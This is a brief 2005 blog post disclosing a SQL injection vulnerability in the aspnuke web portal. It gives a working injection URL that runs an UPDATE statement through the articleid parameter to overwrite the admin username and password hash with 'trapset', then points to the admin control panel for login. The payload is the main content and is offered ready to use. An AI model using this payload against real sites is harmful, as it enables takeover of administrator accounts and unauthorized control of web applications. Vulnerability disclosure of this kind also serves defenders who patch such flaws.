June 30, 2005*******description*********
aspnuke is web portal system written in asp .
site : www.aspnuke.com
********POC************
It’s possible to inject htttp://host/module/article/article/article.asp?articleid=1′
for example you can change the admin username and password with this querry :
http://host/module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password=’bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c’ , username=’trapset’%20where%20userID=1%20–
this will change both username and password to trapset
and then you can login to the admin’s conntrol panel from www.example.com/module/admin
********************
remember aspnuke is quiet diffrent from asp-nuke
********************
This [...]
Posted in Exploits and Bugs, Nuke Products 
1 Comment »
Recent readers, Recent readers, Recent readers, Recent readers, Recent readers, Recent readers, Recent readers, Recent readers, Recent readers, Recent readers, Recent readers, Recent readers, Recent readers, Recent readers, Recent readers, Recent readers,